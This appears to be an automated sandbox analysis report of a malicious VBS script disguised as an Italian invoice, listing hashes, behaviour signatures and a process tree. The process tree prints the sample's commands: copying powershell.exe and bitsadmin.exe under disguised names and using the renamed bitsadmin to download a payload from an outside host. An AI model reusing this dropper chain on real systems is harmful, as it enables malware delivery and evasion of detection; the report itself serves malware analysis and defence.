Analysis
-
max time kernel
41s -
max time network
47s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
20-05-2022 15:28
Static task
static1
Behavioral task
behavioral1
Sample
FattDiffEmessa2020 00616840120.vbs
Resource
win7-20220414-en
General
-
Target
FattDiffEmessa2020 00616840120.vbs
-
Size
4KB
-
MD5
df040acc717de01627876e0ee3fa86df
-
SHA1
de8d3e73eaa96d6dc3140b63808fd7fa316cdc08
-
SHA256
e96c29490b415926118a9342760a5060070e9dd415aee367cca7a0e5146a45fe
-
SHA512
9f563b9eea761dd6ef02db008a130ac207b2e610067489a29dac9f918cdda9ada9130e3b0e26aafb1653ded52f7080fbf2413fff3321c239db46b69839805db9
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1204 uccBtRT.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 848 wrote to memory of 1140 848 WScript.exe 28 PID 848 wrote to memory of 1140 848 WScript.exe 28 PID 848 wrote to memory of 1140 848 WScript.exe 28 PID 848 wrote to memory of 1076 848 WScript.exe 30 PID 848 wrote to memory of 1076 848 WScript.exe 30 PID 848 wrote to memory of 1076 848 WScript.exe 30 PID 848 wrote to memory of 1204 848 WScript.exe 32 PID 848 wrote to memory of 1204 848 WScript.exe 32 PID 848 wrote to memory of 1204 848 WScript.exe 32 PID 848 wrote to memory of 1204 848 WScript.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FattDiffEmessa2020 00616840120.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\puccBtRT.exe2⤵PID:1140
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\uccBtRT.exe2⤵PID:1076
-
-
C:\Users\Admin\AppData\Roaming\uccBtRT.exe"C:\Users\Admin\AppData\Roaming\uccBtRT.exe" /transfer najtec /download https://nowyouknowent.com/werdona/00616840120/blank.css C:\Users\Admin\AppData\Roaming\blank.css2⤵
- Executes dropped EXE
PID:1204
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
182KB
MD50920b14aa67a8b04acf48ffe7c6f0927
SHA13421124253058dc21453ebac531b67aeb999f627
SHA256838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00
SHA5122b0a9800736cb27316be5e376842bce59ce08089046aaef930da837eb59d1c084106ce447320346911c6fa3c8a32e4e41209b12bb868ac2cd9848d69a9adbe51
-
Filesize
182KB
MD50920b14aa67a8b04acf48ffe7c6f0927
SHA13421124253058dc21453ebac531b67aeb999f627
SHA256838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00
SHA5122b0a9800736cb27316be5e376842bce59ce08089046aaef930da837eb59d1c084106ce447320346911c6fa3c8a32e4e41209b12bb868ac2cd9848d69a9adbe51